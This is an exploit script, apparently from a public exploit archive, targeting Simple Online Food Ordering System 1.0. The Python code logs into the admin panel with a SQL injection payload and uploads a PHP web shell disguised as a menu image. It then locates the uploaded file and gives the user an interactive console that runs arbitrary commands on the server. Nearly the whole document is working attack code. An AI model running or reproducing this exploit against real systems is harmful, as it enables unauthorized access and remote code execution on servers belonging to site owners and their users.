# Google Dork: N/A
# Date: 2020-09-22
# Exploit Author: Eren Şimşek
# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip
# Version: 1.0
# Tested on: Windows/Linux - XAMPP Server
# CVE : N/A
# Setup: pip3 install bs4 .
# Exploit Code :
import requests,sys,string,random
from bs4 import BeautifulSoup
def get_random_string(length):
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in
range(length))
return result_str
session = requests.session()
Domain = ""
RandomFileName = get_random_string(5)+".php"
def Help():
print("[?] Usage: python AporlorRCE.py <Domain>")
def Upload():
session = requests.session()
burp0_url = Domain+"/admin/ajax.php?action=save_menu"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64;
rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*",
"Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding":
"gzip, deflate", "Referer":
"http://localhost/fos/admin/index.php?page=menu",
"X-Requested-With": "XMLHttpRequest", "Content-Type":
"multipart/form-data;
boundary=---------------------------21991269520298699981411767018",
"Connection": "close"}
burp0_data =
"-----------------------------21991269520298699981411767018\r\nContent-Disposition:
form-data;
name=\"id\"\r\n\r\n\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition:
form-data;
name=\"name\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition:
form-data;
name=\"description\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition:
form-data;
name=\"status\"\r\n\r\non\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition:
form-data;
name=\"category_id\"\r\n\r\n3\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition:
form-data;
name=\"price\"\r\n\r\n1\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition:
form-data; name=\"img\";
filename=\""+RandomFileName+"\"\r\nContent-Type:
application/x-php\r\n\r\n<?php system($_GET['cmd']);
?>\n\r\n-----------------------------21991269520298699981411767018--\r\n"
try:
Resp = session.post(burp0_url, headers=burp0_headers,
data=burp0_data)
if Resp == "1":
print("[+] Shell Upload Success")
else:
print("[-] Shell Upload Failed")
except:
print("[-] Request Failed")
Help()
def Login():
burp0_url = Domain+"/admin/ajax.php?action=login"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64;
rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*",
"Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding":
"gzip, deflate", "Referer": "http://localhost/fos/admin/login.php",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest", "Connection": "close"}
burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1
#"}
try:
Resp = session.post(burp0_url,
headers=burp0_headers,data=burp0_data)
if Resp.text == "1":
print("[+] Login Success")
else:
print("[+] Login Failed")
except:
print("[-] Request Failed")
Help()
def FoundMyRCE():
global FileName
burp0_url = Domain+"/admin/index.php?page=menu"
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64;
rv:68.0) Gecko/20100101 Firefox/68.0", "Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding":
"gzip, deflate", "Connection": "close",
"Upgrade-Insecure-Requests": "1"}
try:
Resp = session.get(burp0_url, headers=burp0_headers)
Soup = BeautifulSoup(Resp.text, "html5lib")
Data = Soup.find_all("img")
for MyRCE in Data:
if RandomFileName in MyRCE["src"]:
FileName = MyRCE["src"].strip("../assets/img/")
print("[+] Found File Name: " +
MyRCE["src"].strip("../assets/img/"))
except:
print("[-] Request Failed")
Help()
def Terminal():
while True:
Command = input("Console: ")
burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command
try:
Resp = session.get(burp0_url)
print(Resp.text)
except KeyboardInterrupt:
print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23")
except:
print("[-] Request Error")
if __name__ == "__main__":
if len(sys.argv) == 2:
Domain = sys.argv[1]
Login()
Upload()
FoundMyRCE()
Terminal()
else:
Help()